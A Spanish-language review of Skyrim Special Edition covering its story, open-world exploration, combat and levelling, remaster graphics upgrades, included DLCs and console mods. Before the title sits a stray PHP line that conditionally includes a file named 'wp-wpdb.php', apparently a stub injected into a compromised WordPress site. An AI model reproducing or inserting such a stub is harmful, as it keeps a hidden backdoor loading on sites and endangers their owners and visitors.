if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Skyrim Special Edition – La Fortaleza de LeChuck

Análisis Skyrim Special Edition

Skyrim es el último título de la popular saga The Elder Scrolls y, posiblemente, uno de los más populares del género, obteniendo por 2011 un gran éxito de crítica y jugadores. Después de cinco años y más de 20 millones de unidades vendidas, nos llega Skyrim Special Edition, una versión mejorada que incluye todos los DLCs y mods para disfrutar de las aventuras del Sangre de Dragón por las tierras de Skyrim como nunca antes habías visto. Hagamos un repaso de lo más destacado del título y de la nueva edición.

skyrim-special-edition

La saga The Elder Scrolls se ha caracterizado por ofrecer al jugador un mundo enorme y vivo desde sus orígenes allá por 1994, con cientos de misiones y gráficos extraordinarios. La anterior entrega, The Elder Scrolls: Oblivion, ya hizo gala de su enorme jugabilidad y diversión, alzándose como el GOTY de 2006. Sin embargo, 5 años después, Bethesda lo volvió a hacer con Skyrim, y consiguió un éxito aún mayor gracias al buen hacer de la compañía y la comunidad. Hay que recordar que en aquella época comenzó el auge de los gameplays en Youtube, los jugadores subían todo tipo de situaciones disparatadas (imposible olvidar el robo en comercios poniendo a los vendedores calderos en la cabeza) y guías comentadas. También salieron cientos de mods, y todo ello catapultó al juego a lo más alto.

Dragones y mazmorras

Skyrim relata las aventuras del Sangre de Dragón, el personaje del jugador, quien proviene de una casta de individuos ancestrales que pueden absorber los poderes de los dragones caídos y lanzar poderosos gritos. Los dragones han vuelto después de un gran letargo, pero este no es el mayor problema de la población, sino la guerra civil entre los Imperiales y los Capas de la Tormenta que amenaza toda la provincia. ¿De qué lado te posicionarás? ¿A quién serás capaz de traicionar? ¿Por qué han vuelto los dragones? Esto y mucho más te espera a lo largo y ancho de Skyrim, un mundo basto y lleno de misterios.

skyrim-special-edition-2

Skyrim Special Edition proporciona cientos de misiones repartidas entre importantes y «varias», las primeras tendrán relación con la guerra, facciones y personajes de la trama; las otras serán pequeños encargos como eliminación de enemigos, sabotajes, búsqueda de objetos… No te vas a aburrir, y esta diversidad hace que Skyrim sea 100% disfrutable.

Sin embargo, quienes hacen grande Skyrim son sus pobladores; esas gentes que comparten contigo sus preocupaciones, origen y día a día, y serán vitales para profundizar en la trama del juego. En los numerosos pueblos de la provincia veremos individuos de diferentes razas y clases que tendrán un peso en la narrativa del título e incluso algunos de ellos pueden echar una mano en combate, o incluso casarse contigo.

Un mundo fantástico

La primera vez que jugué a Skyrim quedé prendada por la increíble belleza de sus parajes y comencé a explorar su impresionante mundo olvidando por completo las misiones. Quería ver qué había más allá de aquellas montañas, acercarme a la misteriosa casa que divisaba desde un puente y, en definitiva, descubrir lugares no indicados en el mapa.

skyrim-special-edition-3

Si eres un gran aventurero, darás con cuevas, pequeños asentamientos, pueblos, ruinas… Algunas de estas localizaciones no formarán parte de ninguna misión; entrar y rastrear el lugar será decisión personal del jugador, quien puede salir con un gran botín de allí.

El deseo de explorar todo el territorio y encontrar cosas sorprendentes es una de las mejores cosas que tiene el juego y, a día de hoy, el tamaño del mapa y la cantidad de ubicaciones sigue siendo tan asombroso como abrumador.

Tú el bárbaro, tú el arquero…

Además de bonitos rincones y amables vecinos, Skyrim también está poblada por seres despreciables: gigantes, arañas, bandidos… o dragones. Puedes echar a correr en plan sálvese quien pueda o hacerles frente y llevarte sus pertenecias. Para ello habrá que hacer uso de las armas, magia y habilidades de nuestro Sangre de Dragón que irán aumentando a medida que subamos de nivel. También será importante comprar mejor equipo o mejorarlo con el crafteo. Cada vez que subamos un nivel tendremos que elegir si deseamos aumentar la vida, el aguante o la magia, después hay que decidir en qué gastaremos los puntos de habilidad entre un amplio abanico de posibilidades: robo, armas a una mano, arquería, tipos de magia… Pero si nos sobran las monedas podremos pagar a expertos en la materia o buscar libros específicos para aumentar nuestro dominio.

skyrim-special-edition-4

Ya hemos empezado a dar forma a nuestro personaje, ahora ya lo podemos lanzar contra enemigos. Pues bien, en cada mano podremos equiparle un arma o magia, salvo para los que usan a dos manos que las tendrán ocupadas. En mi caso, como maga que soy, me equipo en la mano izquierda un hechizo y en la derecha un arma a una mano. También tengo seleccionado un grito y otros poderes pasivos que he aprendido. La salud, magia y aguante se regeneran poco a poco, pero si la cosa se pone fea pues siempre hay una amplia oferta de pociones que nos pondrán las cosas más fáciles. ¿Imposible? Pues quizá quieras contratar a un mercenario en una taberna o llevarte a algún personaje que te deba un favor. A tu compañero podrás darle algunas órdenes e intercambiar objetos pero actuará por su cuenta y riesgo, así que no le quites ojo. Bueno, y si tienes un buen caballo, repartirá unas coces en tu honor.

Un buen lavado de cara

Skyrim Special Edition luce mejor que nunca en consola, corriendo a 1080p y 30 fps estables, por lo que su ambientación será un auténtico regalo visual. Este remastered incluye un buen puñazo de mejoras, estas son:

• Gráficos y efectos renovados
  • Rayos crepusculares volumétricos
  • Profundidad de campo dinámica
  • Reflejos en tiempo real
  • Nuevos efectos de sombras en la nieve y en el agua

Además, Skyrim Special Edition incluye los DLCs Dawnguard, Hearthfire y Dragonborn y la posibilidad de jugar a mods de PC en consola. Tan solo hay que registrarse en la web de Bethesda y elegir entre un amplio catálogo. Por otro lado, las partidas guardadas de PC del original funcionan en la versión para PC de Skyrim Special Edition.

skyrim-special-edition-5

Lo único que se le puede achacar al juego son las texturas, modelados de personajes (algunas caras dan realmente miedo) y las animaciones, algo común en los remastered que tienen unos cuantos años, pero aún así no desluce la grandeza del título.

Skyrim Special Edition nos trae de vuelta uno de los grandes del género junto con una serie de mejoras gráficas, y DLCs y mods, elementos que hicieron que el juego gozara de gran popularidad en su tiempo. Son muchas las cosas que puedes hacer en Skyrim y esta es una oportunidad maravillosa para descubrir un estupendo título o recorrer de nuevo su geografía.